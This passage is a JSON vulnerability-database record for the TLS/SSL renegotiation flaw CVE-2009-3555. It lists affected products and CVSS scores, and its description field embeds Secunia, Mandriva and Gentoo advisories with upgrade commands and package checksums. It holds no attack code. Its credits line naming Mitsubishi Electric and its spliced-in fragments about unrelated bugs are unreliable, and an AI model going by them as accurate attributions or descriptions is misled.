"model": "opensolaris build snv 127",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2.10)"
},
{
"_id": null,
"model": "java system web server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "project openssl j",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.0.4"
},
{
"_id": null,
"model": "windows server web edition sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "opensolaris build snv 86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#120541"
},
{
"db": "BID",
"id": "36935"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
},
{
"db": "NVD",
"id": "CVE-2009-3555"
}
]
},
"credits": {
"_id": null,
"data": "Mitsubishi Electric reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
}
],
"trust": 0.6
},
"cve": "CVE-2009-3555",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2009-3555",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-41001",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-3555",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2009-3555",
"trust": 0.8,
"value": "0"
},
{
"author": "CNNVD",
"id": "CNNVD-200911-069",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-41001",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#120541"
},
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
},
{
"db": "NVD",
"id": "CVE-2009-3555"
}
]
},
"description": {
"_id": null,
"data": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue. A vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction. Multiple vendors\u0027 TLS protocol implementations are prone to a security vulnerability related to the session-renegotiation process. \nSuccessful exploits of this issue may allow attackers to perform limited man-in-the-middle attacks against vulnerable applications. Note that this issue does not allow attackers to decrypt encrypted data. The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. According to the Network Working Group:The server treats the client\u0027s initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data.This issue affects SSL version 3.0 and newer and TLS version 1.0 and newer. \n \n The gnutls_x509_crt_get_serial function in the GnuTLS library before\n 1.2.1, when running on big-endian, 64-bit platforms, calls the\n asn1_read_value with a pointer to the wrong data type and the wrong\n length value, which allows remote attackers to bypass the certificate\n revocation list (CRL) check and cause a stack-based buffer overflow\n via a crafted X.509 certificate, related to extraction of a serial\n number (CVE-2010-0731). \n \n The updated packages have been patched to correct these issues. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. ----------------------------------------------------------------------\n\n\nhttp://secunia.com/research/\n\nhttp://secunia.com/company/jobs/open_positions/reverse_engineer\n\n\n----------------------------------------------------------------------\n\nTITLE:\nOracle Application Server Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA44293\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44293/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44293\n\nRELEASE DATE:\n2011-04-24\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44293/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44293/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44293\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Oracle Application\nServer, which can be exploited by malicious users and people to\nmanipulate certain data. \n\n1) An error exists in the C Oracle SSL API of the Oracle Security\nService component and can be exploited to manipulate certain data. \n\nFor more information see vulnerability #1:\nSA37291\n\n2) An unspecified error in the Oracle HTTP Server component can be\nexploited to manipulate certain data. \n\n3) An error exists in the Midtier Infrastructure of the Portal\ncomponent and can be exploited to manipulate certain data. \n\nFor more information see vulnerability #3:\nSA44246\n\n4) An unspecified error in the Single Sign On component can be\nexploited by authenticated users to manipulate certain data. \n\nThe vulnerabilities are reported in the following products:\n* Oracle Application Server 10g Release 2 version 10.1.2.3.0. \n* Oracle Application Server 10g Release 3 version 10.1.3.5.0. \n\nSOLUTION:\nApply updates (please see the vendor\u0027s advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nIt is currently unclear who reported these vulnerabilities as the\nOracle Critical Patch Update for April 2011 only provides a bundled\nlist of credits. This section will be updated when/if the original\nreporter provides more information. \n\nORIGINAL ADVISORY:\nOracle:\nhttp://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html#AppendixAS\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2010:084\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : java-1.6.0-openjdk\n Date : April 28, 2010\n Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple Java OpenJDK security vulnerabilities has been identified\n and fixed:\n \n - TLS: MITM attacks via session renegotiation (CVE-2009-3555). \n - Loader-constraint table allows arrays instead of only the b\n ase-classes (CVE-2010-0082). \n - Policy/PolicyFile leak dynamic ProtectionDomains. (CVE-2010-0084). \n - File TOCTOU deserialization vulnerability (CVE-2010-0085). \n - Inflater/Deflater clone issues (CVE-2010-0088). \n - Unsigned applet can retrieve the dragged information before drop\n action occurs (CVE-2010-0091). \n - AtomicReferenceArray causes SIGSEGV -\u003e SEGV_MAPERR error\n (CVE-2010-0092). \n - System.arraycopy unable to reference elements beyond\n Integer.MAX_VALUE bytes (CVE-2010-0093). \n - Deserialization of RMIConnectionImpl objects should enforce stricter\n checks (CVE-2010-0094). \n - Subclasses of InetAddress may incorrectly interpret network addresses\n (CVE-2010-0095). \n - JAR unpack200 must verify input parameters (CVE-2010-0837). \n - CMM readMabCurveData Buffer Overflow Vulnerability (CVE-2010-0838). \n - Applet Trusted Methods Chaining Privilege Escalation Vulner ability\n (CVE-2010-0840). \n - No ClassCastException for HashAttributeSet constructors if run with\n -Xcomp (CVE-2010-0845)\n - ImagingLib arbitrary code execution vulnerability (CVE-2010-0847). \n - AWT Library Invalid Index Vulnerability (CVE-2010-0848). \n \n Additional security issues that was fixed with IcedTea6 1.6.2:\n - deprecate MD2 in SSL cert validation (CVE-2009-2409). \n - ICC_Profile file existence detection information leak\n (CVE-2009-3728). \n - JRE AWT setDifflCM stack overflow (CVE-2009-3869). \n - JRE AWT setBytePixels heap overflow (CVE-2009-3871). \n - JPEG Image Writer quantization problem (CVE-2009-3873). \n - ImageI/O JPEG heap overflow (CVE-2009-3874). \n - MessageDigest.isEqual introduces timing attack vulnerabilities\n (CVE-2009-3875). \n - OpenJDK ASN.1/DER input stream parser denial of service\n (CVE-2009-3876, CVE-2009-3877)\n - GraphicsConfiguration information leak (CVE-2009-3879). \n - UI logging information leakage (CVE-2009-3880). \n - resurrected classloaders can still have children (CVE-2009-3881). \n - Numerous static security flaws in Swing (findbugs) (CVE-2009-3882). \n - Mutable statics in Windows PL\u0026F (findbugs) (CVE-2009-3883). \n - zoneinfo file existence information leak (CVE-2009-3884). \n - BMP parsing DoS with UNC ICC links (CVE-2009-3885). \n \n Additionally Paulo Cesar Pereira de Andrade (pcpa) at Mandriva found\n and fixed a bug in IcedTea6 1.8 that is also applied to the provided\n packages:\n \n * plugin/icedteanp/IcedTeaNPPlugin.cc\n (plugin_filter_environment): Increment malloc size by one to\n account for\n NULL terminator. Bug# 474. \n \n Packages for 2009.0 are provided due to the Extended Maintenance\n Program. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3728\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3871\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3873\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3874\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3875\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3876\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3877\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3879\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3880\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3881\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3882\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3883\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3884\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3885\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848\n http://article.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/8938\n http://blogs.sun.com/darcy/resource/OpenJDK_6/openjdk6-b18-changes-summary.html\n http://icedtea.classpath.org/hg/release/icedtea6-1.8/rev/a6a02193b073\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2009.0:\n 37c14ebea4b3ceccbecba4ffea2630a6 2009.0/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.i586.rpm\n 3f7ba1d78aaf5f1ca56e86fcb48e7192 2009.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.0.i586.rpm\n 12963efa8b4ea6691ba68f4e72e81e5d 2009.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.0.i586.rpm\n 6387d4381c518c5658701c114c5fcb9d 2009.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.0.i586.rpm\n f90d2a22c10b6eb30aedef13207d346c 2009.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.0.i586.rpm\n 01e62b54974a3d1b5232de0baa196e41 2009.0/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.0.i586.rpm \n 212262f34829af20e53fb2076fa78d25 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n 630941e679a033285ddf5cb3e4c1d092 2009.0/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm\n 6330c6dda9cf7c59a90f529bceeee17b 2009.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm\n c7d708c5f14d710a6bdcc352bb18a55a 2009.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm\n edf4b1d8efeb157bb0f19b4c4cc55935 2009.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm\n ac9f8227297249940b1845f3ad95165f 2009.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm\n d1ed0ce1155c85c423d0cbe47eadfa5b 2009.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.0.x86_64.rpm \n 212262f34829af20e53fb2076fa78d25 2009.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.0.src.rpm\n\n Mandriva Linux 2009.1:\n 304bc2cab18b29781bfac69d4927ddce 2009.1/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.i586.rpm\n 77f0d2e2b2c04288a5aae608a2f73f1a 2009.1/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.1.i586.rpm\n 7ff7542b4328fd978725f8e0b02590d9 2009.1/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.1.i586.rpm\n 3d1bf214209ea3aef86b58962e80901e 2009.1/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.1.i586.rpm\n f52cf5f8d3f85b98da246963d583f6bc 2009.1/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.1.i586.rpm\n 87b2fd7ac9883e624e71faa993559e78 2009.1/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.1.i586.rpm \n 0ff2ca4dfc122a3538349ed2dab6ed81 2009.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.src.rpm\n\n Mandriva Linux 2009.1/X86_64:\n 883105d4347bb0864c7c73e4f0865066 2009.1/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm\n ac44d41806625e0be7a55ff30bf1f0e7 2009.1/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm\n 67db7247fbf1b5be5391f33603b9148c 2009.1/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm\n 0b6e7a93df49306976453daf29a29d96 2009.1/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm\n 67e679d7aa4545a968889dcbb1a3fa8e 2009.1/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm\n 4042e3ae7e3b2dbdcba0e73aadd219d5 2009.1/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2009.1.x86_64.rpm \n 0ff2ca4dfc122a3538349ed2dab6ed81 2009.1/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2009.1.src.rpm\n\n Mandriva Linux 2010.0:\n f3c1bb7b091d5889a856edf93e066367 2010.0/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.i586.rpm\n 7f717091a34f98e9547c698bf08065f5 2010.0/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2010.0.i586.rpm\n 21b8532c934559100b0dbc498ba3c52e 2010.0/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2010.0.i586.rpm\n 8711fdef27cce9af73191903f85dbcd6 2010.0/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2010.0.i586.rpm\n 1905269f878bb1c6367dedc6797f6914 2010.0/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2010.0.i586.rpm\n c5f53d24770de6704f00fdf34c87a703 2010.0/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2010.0.i586.rpm \n b789ff663963ae8b60a0d189b870907c 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.src.rpm\n\n Mandriva Linux 2010.0/X86_64:\n 100203d38e76348f262d69d2cae8a7ba 2010.0/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm\n f155019a4a22d7bf7265c67024dcbc33 2010.0/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm\n 8eaf304d6eb93212d1045adc301de385 2010.0/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm\n 2e2082bd89db22cf5fa4be2ebaceb71c 2010.0/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm\n 3e7a1849db88a8b8ddcdf30441edfcb7 2010.0/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm\n fbc9da5e2080972f6f8c01f23e86890f 2010.0/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdv2010.0.x86_64.rpm \n b789ff663963ae8b60a0d189b870907c 2010.0/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdv2010.0.src.rpm\n\n Mandriva Enterprise Server 5:\n 742a7a6dcc82962a132eadb91a2b1736 mes5/i586/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm\n 3acd32ccd1fee71f07ccb4b038434ffd mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm\n c3358ac84dbc950752655fee46fd5e4b mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm\n a30ef6b33fd9ba1403ab46ef9643efdb mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm\n 534f95a18c4798ec80cdfe47bd1148a8 mes5/i586/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm\n e79e4bd9462096222f5b07d681b3d418 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdvmes5.1.i586.rpm \n 0bc580c8d4d6e57cbee939bf68743170 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 180566f92a5564c747c716ecdf082c8f mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm\n 5e05d90fe32dfce7b15db7d9e5604227 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm\n 09506c689ed0265023861e006fbcb624 mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm\n c9ff4a3a4695c56b13268d76c355cfbe mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm\n 0a70a54c2eed68e723cbc65de63bfbff mes5/x86_64/java-1.6.0-openjdk-plugin-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm\n 166c980a8479cd915f3507070c25508e mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-2.b18.2mdvmes5.1.x86_64.rpm \n 0bc580c8d4d6e57cbee939bf68743170 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-2.b18.2mdvmes5.1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFL1/vUmqjQ0CJFipgRAlcyAJ9+2v53cztdo8nXoixp0vg0IuQjrACbB/vW\n+oOtru3I2iYRjlx04fi7wMw=\n=rIwa\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201301-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Mozilla Products: Multiple vulnerabilities\n Date: January 08, 2013\n Bugs: #180159, #181361, #207261, #238535, #246602, #251322,\n #255221, #255234, #255687, #257577, #260062, #261386,\n #262704, #267234, #273918, #277752, #280226, #280234,\n #280393, #282549, #284439, #286721, #290892, #292034,\n #297532, #305689, #307045, #311021, #312361, #312645,\n #312651, #312675, #312679, #312763, #313003, #324735,\n #326341, #329279, #336396, #341821, #342847, #348316,\n #357057, #360055, #360315, #365323, #373595, #379549,\n #381245, #388045, #390771, #395431, #401701, #403183,\n #404437, #408161, #413657, #419917, #427224, #433383,\n #437780, #439586, #439960, #444318\n ID: 201301-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Mozilla Firefox,\nThunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner, some of which\nmay allow execution of arbitrary code or local privilege escalation. \n\nBackground\n==========\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird\nan open-source email client, both from the Mozilla Project. The\nSeaMonkey project is a community effort to deliver production-quality\nreleases of code derived from the application formerly known as the\n\u0027Mozilla Application Suite\u0027. XULRunner is a Mozilla runtime package\nthat can be used to bootstrap XUL+XPCOM applications such as Firefox\nand Thunderbird. NSS is Mozilla\u0027s Network Security Services library\nthat implements PKI support. IceCat is the GNU version of Firefox. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 www-client/firefox \u003c 10.0.11 \u003e= 10.0.11\n 2 www-client/firefox-bin \u003c 10.0.11 \u003e= 10.0.11\n 3 mail-client/thunderbird \u003c 10.0.11 \u003e= 10.0.11\n 4 mail-client/thunderbird-bin\n \u003c 10.0.11 \u003e= 10.0.11\n 5 www-client/seamonkey \u003c 2.14-r1 \u003e= 2.14-r1\n 6 www-client/seamonkey-bin\n \u003c 2.14 \u003e= 2.14\n 7 dev-libs/nss \u003c 3.14 \u003e= 3.14\n 8 www-client/mozilla-firefox\n \u003c= 3.6.8 Vulnerable!\n 9 www-client/mozilla-firefox-bin\n \u003c= 3.5.6 Vulnerable!\n 10 mail-client/mozilla-thunderbird\n \u003c= 3.0.4-r1 Vulnerable!\n 11 mail-client/mozilla-thunderbird-bin\n \u003c= 3.0 Vulnerable!\n 12 www-client/icecat \u003c= 10.0-r1 Vulnerable!\n 13 net-libs/xulrunner \u003c= 2.0-r1 Vulnerable!\n 14 net-libs/xulrunner-bin \u003c= 1.8.1.19 Vulnerable!\n -------------------------------------------------------------------\n NOTE: Certain packages are still vulnerable. Users should migrate\n to another package if one is available or wait for the\n existing packages to be marked stable by their\n architecture maintainers. \n -------------------------------------------------------------------\n 14 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox,\nThunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could entice a user to view a specially crafted web\npage or email, possibly resulting in execution of arbitrary code or a\nDenial of Service condition. Furthermore, a remote attacker may be able\nto perform Man-in-the-Middle attacks, obtain sensitive information,\nbypass restrictions and protection mechanisms, force file downloads,\nconduct XML injection attacks, conduct XSS attacks, bypass the Same\nOrigin Policy, spoof URL\u0027s for phishing attacks, trigger a vertical\nscroll, spoof the location bar, spoof an SSL indicator, modify the\nbrowser\u0027s font, conduct clickjacking attacks, or have other unspecified\nimpact. \n\nA local attacker could gain escalated privileges, obtain sensitive\ninformation, or replace an arbitrary downloaded file. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Mozilla Firefox users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-10.0.11\"\n\nAll users of the Mozilla Firefox binary package should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-bin-10.0.11\"=\n\n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-10.0.11\"\n\nAll users of the Mozilla Thunderbird binary package should upgrade to\nthe latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-bin-10.0.11\"\n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/seamonkey-2.14-r1\"\n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/seamonkey-bin-2.14\"\n\nAll NSS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/nss-3.14\"\n\nThe \"www-client/mozilla-firefox\" package has been merged into the\n\"www-client/firefox\" package. To upgrade, please 